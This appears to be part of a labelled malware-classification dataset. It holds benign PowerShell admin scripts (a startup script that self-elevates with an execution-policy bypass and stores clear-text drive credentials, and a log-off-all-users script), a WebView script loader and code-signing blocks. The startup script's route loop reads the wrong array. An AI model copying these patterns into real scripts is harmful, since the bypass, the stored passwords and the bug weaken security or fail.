+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXf // SIG // tnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SU // SIG // HDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO // SIG // ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten // SIG // IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh // SIG // 8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMUR // SIG // HXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54W // SIG // cmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEE // SIG // AYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+ // SIG // ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBe // SIG // Yl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEE // SIG // AYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3 // SIG // dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9z // SIG // aXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkG // SIG // CSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQE // SIG // AwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaA // SIG // FNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0w // SIG // S6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9w // SIG // a2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw // SIG // LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB // SIG // BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMu // SIG // Y3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9n // SIG // ATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2 // SIG // P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2 // SIG // HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1 // SIG // AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3 // SIG // lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BU // SIG // hUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tu // SIG // PywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZ // SIG // lvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdU // SIG // bZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz // SIG // 138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFH // SIG // qfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xB // SIG // Zj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 // SIG // Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 // SIG // 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784 // SIG // cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1V // SIG // M1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jEL // SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x // SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv // SIG // c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z // SIG // b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYw // SIG // JAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0LTRCOTIt // SIG // RkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3Rh // SIG // bXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAaKBSisy4 // SIG // y86pl8Xy22CJZExE2vOggYMwgYCkfjB8MQswCQYDVQQG // SIG // EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE // SIG // BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv // SIG // cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGlt // SIG // ZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF // SIG // AOlc9fkwIhgPMjAyNDAxMjUyMzAwMDlaGA8yMDI0MDEy // SIG // NjIzMDAwOVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA // SIG // 6Vz1+QIBADAHAgEAAgIC0DAHAgEAAgIRLjAKAgUA6V5H // SIG // eQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZ // SIG // CgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqG // SIG // SIb3DQEBBQUAA4GBAGpTyuI/YmZL0fmiogEwgrsrjImh // SIG // WYhcQFbUPqjwIN4OmeXeu5+rCkqS3bvzEtmU3X4bvSUO // SIG // +wRAqWYUsB0OEgp1QhvpsznU7HjjUUO2mHHMUy/gRFb5 // SIG // U6l10yeKm1zulQ1VtibXyZVnE+HEpqqfapRRsw9eomTT // SIG // eT85tOHomJ6CMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE // SIG // BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV // SIG // BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD // SIG // b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp // SIG // bWUtU3RhbXAgUENBIDIwMTACEzMAAAHenkielp8oRD0A // SIG // AQAAAd4wDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3 // SIG // DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx // SIG // IgQgaEplA/q0lVuXJPPxVtGBVNORYKO8JLSSSA3Q8tNN // SIG // 8iMwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCCO // SIG // PiOfDcFeEBBJAn/mC3MgrT5w/U2z81LYD44Hc34dezCB // SIG // mDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpX // SIG // YXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYD // SIG // VQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV // SIG // BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw // SIG // AhMzAAAB3p5InpafKEQ9AAEAAAHeMCIEIFLxbJLQmUv7 // SIG // JKwSnJZEJ4dGBWPKEAicvEBXJAzw2hTNMA0GCSqGSIb3 // SIG // DQEBCwUABIICAJlwoygjS/Ei6GSOdCzWRS5sEBZ66mCt // SIG // El2x9gsTAMzv3oeoxeozxB1QB+ZibcivfgT+NjPMUGvq // SIG // 6MdNp95vwUIvA5flfOh9PRTRTHe4DVwDUkNoiBvsE5V7 // SIG // MM6eVL/dehQRk+O6qHPBg2LOBWfySwMABHHzASP35MD5 // SIG // 90skgWFuzdR/JcvspX4L0VBBH27MwdQjGeGp6kJ+krp6 // SIG // rgxAV9FvZGh2AUiTIc7zdXEheIiNBwaCG9GMixqNW13X // SIG // h7AgiAPKWrFcoRIRwWcQ+YjT+oSHm39PSZpoKt/DLO68 // SIG // svdszQexKiY0iZw4ySZOExLzkjWU6SiKWGJNtArQjueH // SIG // KDNzd+Q5ftfl2xE7Ra8yAnyX1LdmY4pyqicyyoxTAbMN // SIG // VwCsmasRUB/UXZSUaJzyFkjLjHBw0nG8JJOKEBkNQ6Tf // SIG // dtJmHM8OoAgaiMpvdrfXvEXw6ycHsRNStH+kgKcDl/Of // SIG // hm7Pjr0FvBNnPzEwv/nkFKolNCmZuX1+ihiOeuyoxcLZ // SIG // 8T49teKhF7FYO4iRwUX8CeRzrkHrmlDB/9okdHqB0tEx // SIG // QcrYzFWbIBMLZNLS08bnU97cFK3ovZkx2MpxWZICuq5i // SIG // MO+TPTXvZW4nMGjoMfcTjRrlTyZe9tbxCNNuxqCG+Grt // SIG // pTLq++KMAbp5BBI6f/Udr2At6XUlmGY9OLq2 // SIG // End signature block
combined_dataset/train/non-malicious/Windows Startup Script_1.ps1
Windows Startup Script_1.ps1
<#====================================================================================== File Name : Startup.ps1 Original Author : Kenneth C. Mazie : Description : This is a Windows startup script with pop-up notification and checks to : assure things are not exectuted if already running or set. It can be run : as a personal startup script or as a domain startup (with some editing). : It is intended to be executed from the Start Menu "All Programs\\Startup" folder. : : The script will Start programs, map shares, set routes, and can email the results : if desired. The email subroutine is commented out. You'll need to edit it yourself. : When run with the "debug" variable set to TRUE it also displays staus in the : PowerShell command window. Other wise all operation statuses are displayed in pop-up : ballons near the system tray. : : To call the script use the following in a shortcut or in the RUN registry key. : "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden –Noninteractive -NoLogo -Command "&{C:\\Startup.ps1}" : Change the script name and path as needed to suit your environment. : : Be sure to edit all sections to suit your needs before executing. Be sure to : enable sections you wish to run by uncommenting them at the bottom of the script. : : Route setting is done as a function of selecting a specific Network Adapter with the intent : of manually altering your routes for hardline or WiFi connectivity. This section you will : need to customize to suit your needs or leave commented out. This allowed me to : alter the routing for my office (Wifi) or lab (hardline) by detecting whether my : laptop was docked or not. The hardline is ALWAYS favored as written. : : To identify process names to use run "get-process" by itself to list process : names that PowerShell will be happy with, just make sure each app you want to : identify a process name for is already running first. : : A 2 second sleep delay is added to smooth out processing but can be removed if needed. : Notes : Sample script is safe to run as written, it will only load taskmanager and firefox. : In general, I did not write this script for ease of readability. Most commands are : one-liner style, sorry if that causes you grief. : Warnings : Drive mapping passwords are clear text within the script. : : Last Update by : Kenneth C. Mazie (kcmjr) Version History : v1.0 - 05-03-12 - Original Change History : v2.0 - 11-15-12 - Minor edits : v3.0 - 12-10-12 - Converted application commands to arrays : v4.0 - 02-14-13 - Converted all other sections to arrays : =======================================================================================#> clear-host $Debug = $True $CloudStor = $False $ScriptName = "Startup Script" #--[ Prep Pop-up Notifications ]-- [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") $Icon = [System.Drawing.SystemIcons]::Information $Notify = new-object system.windows.forms.notifyicon $Notify.icon = $Icon #--[ NOTE: Available tooltip icons are = warning, info, error, and none $Notify.visible = $true #--[ Force to execute with admin priviledge ]-- $identity = [Security.Principal.WindowsIdentity]::GetCurrent() $principal = new-object Security.Principal.WindowsPrincipal $identity if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $false) {$Args = '-noprofile -nologo -executionpolicy bypass -file "{0}"' -f $MyInvocation.MyCommand.Path;Start-Process -FilePath 'powershell.exe' -ArgumentList $Args -Verb RunAs;exit} if ($debug){write-host "`n------[ Running with Admin Privileges ]------`n" -ForegroundColor DarkCyan} $Notify.ShowBalloonTip(2500,$ScriptName,"Script is running with full admin priviledges",[system.windows.forms.tooltipicon]::Info) if ($debug){write-host "Running in DEBUG Mode..." -ForegroundColor DarkCyan} function Pause-Host { #--[ Only use if you need a countdown timer ]-- param($Delay = 10) $counter = 0; While(!$host.UI.RawUI.KeyAvailable -and ($Delay-- -ne $counter )) #--count down #While(!$host.UI.RawUI.KeyAvailable -and ($counter++ -lt $Delay )) #--count up { clear-host if ($debug){Write-Host "testing... $Delay"} #--count down #Write-Host "testing... $counter" #--count up [Threading.Thread]::Sleep(1000) } } Function SetRoutes { #--[ Array consists of Network, Mask ]-- $RouteArray = @() $RouteArray += , @("10.0.0.0","255.0.0.0") $RouteArray += , @("172.1.0.0","255.255.0.0") $RouteArray += , @("192.168.1.0","255.255.255.0") #--[ Add more route entries here... ]-- $Index = 0 Do { $RouteNet = $ShareArray[$Index][0] $RouteMask = $ShareArray[$Index][1] iex "route delete $RouteNet" Sleep (2) iex "route add $RouteNet mask $RouteMask $IP" Sleep (2) $Index++ } While ($Index -lt $RouteArray.length) } Function SetMappings { #--[ Array consists of Drive Letter, Path, User, and Password ]-- $ShareArray = @() $ShareArray += , @("J:","\\\\192.168.1.250\\Share1","username","password") $ShareArray += , @("K:","\\\\192.168.1.250\\Share2","username","password") #--[ Add more mapping entries here... ]-- $Index = 0 Do { $MapDrive = $ShareArray[$Index][0] $MapPath = $ShareArray[$Index][1] $MapUser = $ShareArray[$Index][2] $MapPassword = $ShareArray[$Index][3] $net = $(New-Object -Com WScript.Network) if ( Exists-Drive $MapDrive){$Notify.ShowBalloonTip(2500,$ScriptName,"Drive $MapDrive is already mapped...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Drive $MapDrive already mapped" -ForegroundColor DarkRed}}else{if (test-path $MapPath){$net.MapNetworkDrive($MapDrive, $MapPath, "False",$MapUser,$MapPassword);$Notify.ShowBalloonTip(2500,$ScriptName,"Mapping Drive $MapDrive...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Mapping Drive $MapDrive" -ForegroundColor DarkGreen}}else{$Notify.ShowBalloonTip(2500,$ScriptName,"Cannot Map Drive $MapDrive - Target Not Found...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Cannot Map Drive $MapDrive - Target Not Found" -ForegroundColor DarkRed}}} Sleep (2) $Index++ }While ($Index -lt $ShareArray.length) } Function Exists-Drive { param($driveletter) (New-Object System.IO.DriveInfo($driveletter)).DriveType -ne 'NoRootDirectory' } Function LoadApps { #--[ Array consists of Process Name, File Path, Arguements, Title ]-- $AppArray = @() $AppArray += , @("firefox","C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe","https://www.google.com","FireFox") #--[ Add more app entries here... ]-- #--[ Cloud Storage Provider Subsection ]-- if (!$CloudStor ){$Notify.ShowBalloonTip(2500,$ScriptName,"Cloud Providers Bypassed...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Cloud Providers Bypassed..." -ForegroundColor Magenta;}} else { $AppArray += , @("googledrivesync","C:\\Program Files (x86)\\Google\\Drive\\googledrivesync.exe","/autostart","GoogleDrive") #--[ Add more cloud entries here... ]-- } $AppArray += , @("taskmgr","C:\\Windows\\System32\\taskmgr.exe"," ","Task Manager") #--[ Add more app entries here... ]-- $Index = 0 Do { $AppProcess = $AppArray[$Index][0] $AppExe = $AppArray[$Index][1] $AppArgs = $AppArray[$Index][2] $AppName = $AppArray[$Index][3] If((get-process -Name $AppProcess -ea SilentlyContinue) -eq $Null){start-process -FilePath $AppExe -ArgumentList $AppArgs ;$Notify.ShowBalloonTip(2500,$ScriptName,"$AppName is loading...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Loading" $AppName "..." -ForegroundColor DarkGreen}}else{$Notify.ShowBalloonTip(2500,$ScriptName,"$AppName is already running...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "$AppName Already Running..." -ForegroundColor DarkRed } } Sleep (2) $Index++ } While ($Index -lt $AppArray.length) } <# function SendMail { #param($strTo, $strFrom, $strSubject, $strBody, $smtpServer) param($To, $From, $Subject, $Body, $smtpServer) $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer) $msg.From = $From $msg.To.Add($To) $msg.Subject = $Subject $msg.IsBodyHtml = 1 $msg.Body = $Body $smtp.Send($msg) } #> Function IdentifyNics { $Domain1 = "LabDomain.com" $Domain2 = "OfficeDomain.com" #--[ Detect Network Adapters ]-- $Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.IPAddress -like "192.168.1.*" } #--[ Alternate detection methods]-- #$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.IPAddress -like "192.168.1.*" } | where {$_.DNSDomainSuffixSearchOrder -match $Domain2} #$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.Description -like "Marvell Yukon 88E8056 PCI-E Gigabit Ethernet Controller" } $WiredIP = ([string]$Wired.IPAddress).split(" ") $WiredDesc = $Wired.Description if ($debug){ write-host "Name: " $Wired.Description`n"DNS Domain: " $Wired.DNSDomainSuffixSearchOrder`n"IPv4: " $WiredIP[0]`n"IPv6: " $WiredIP[1]`n"" if ($WiredIP[0]){$Notify.ShowBalloonTip(2500,$ScriptName,"Detected $WiredDesc",[system.windows.forms.tooltipicon]::Info)}else{$Notify.ShowBalloonTip(2500,$ScriptName,"Hardline not detected",[system.windows.forms.tooltipicon]::Info)} } sleep (2) $WiFi = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.Description -like "Intel(R) Centrino(R) Advanced-N 6250 AGN" } $WiFiIP = ([string]$WiFi.IPAddress).split(" ") $WiFiDesc = $WiFi.Description write-host "Name: " $WiFi.Description`n"DNS Domain: " $WiFi.DNSDomainSuffixSearchOrder`n"IPv4: " $WiFiIP[0]`n"IPv6: " $WiFiIP[1] if ($WiFiIP[0]){$Notify.ShowBalloonTip(2500,$ScriptName,"Detected $WiFiDesc",[system.windows.forms.tooltipicon]::Info)}else{$Notify.ShowBalloonTip(2500,$ScriptName,"WiFi not detected",[system.windows.forms.tooltipicon]::Info)} sleep (2) #--[ Set Routes ]-- if ($WiredIP[0]) { #--[ The hardline is connected. Favor the hardline if both connected ]-- $IP = $WiredIP[0] if ($Wired.DNSDomainSuffixSearchOrder -like $Domain1 -or $Wired.DNSDomainSuffixSearchOrder -like $Domain2) { #--[ the hardline is connected ]-- write-host ""`n"Setting routes for hardline"`n"" $Notify.ShowBalloonTip(2500,$ScriptName,"Setting routes for hardline...",[system.windows.forms.tooltipicon]::Info) #SetRoutes $IP } } else { if ($WiFiIP[0]) { if ($WiFi.DNSDomainSuffixSearchOrder -like $Domain2) { #--[ The wifi is connected --] $IP = $WiFiIP[0] write-host ""`n"Setting routes for wifi"`n"" $Notify.ShowBalloonTip(2500,$ScriptName,"Setting routes for wifi...",[system.windows.forms.tooltipicon]::Info) #SetRoutes $IP } } } } #Write-Host $IP #IdentifyNics #SetMappings #Pause-Host LoadApps If ($debug){write-host "Completed All Operations..." -ForegroundColor DarkCyan}
combined_dataset/train/non-malicious/Logoff all users_2.ps1
Logoff all users_2.ps1
function RemoveSpace([string]$text) { $private:array = $text.Split(" ", ` [StringSplitOptions]::RemoveEmptyEntries) [string]::Join(" ", $array) } $quser = quser foreach ($sessionString in $quser) { $sessionString = RemoveSpace($sessionString) $session = $sessionString.split() if ($session[0].Equals(">nistuke")) { continue } if ($session[0].Equals("USERNAME")) { continue } # Use [1] because if the user is disconnected there will be no session ID. $result = logoff $session[1] }
combined_dataset/train/non-malicious/sample_37_49.ps1
sample_37_49.ps1
let pluginUrl = window.chrome.webview.hostObjects.sync.external.GetPluginUrl(); let scripts = [pluginUrl, "Scripts/common.eventHandlers.js", "Scripts/aspire.eventHandlers.js"]; let currentScriptElement = document.querySelector("script[src='Scripts/aspire.plugin.js']"); if (currentScriptElement !== null) { scripts.forEach(element => { let newScriptElement = document.createElement("script"); newScriptElement.setAttribute("src", element); newScriptElement.setAttribute("type", "text/javascript"); newScriptElement.async = false; currentScriptElement.parentNode.insertBefore(newScriptElement, currentScriptElement.nextSibling); currentScriptElement = newScriptElement; }); } // SIG // Begin signature block // SIG // MIInywYJKoZIhvcNAQcCoIInvDCCJ7gCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // UxB0+L8e5mCO3kWXMDVZYdvMUiDr+vyn6eq4Ov+KTVKg // SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA // SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX // SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY // SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw // SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+ // SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm // SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq // SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5 // SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y // SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB // SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd // SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy // SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx // SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw // SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w // SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t // SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB // SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3 // SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo // SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v // SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5 // SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D // SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN // SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI // SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY // SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ // SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/ // SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2 // SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok // SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7 // SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7 // SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW // SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y // SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow // SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL // SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo // SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK // SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT // SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv // SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw // SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG // SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg // SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC // SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq // SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ // SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X // SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL // SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5 // SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt // SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3 // SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP // SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl // SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE // SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9 // SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C // SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp // SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A // SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE // SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB // SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k // SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h // SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy // SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0 // SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv // SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB // SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr // SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp // SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW // SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H // SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS // SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m // SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj // SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO // SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat // SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n // SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA // SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj // SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv // SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3 // SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs // SIG // 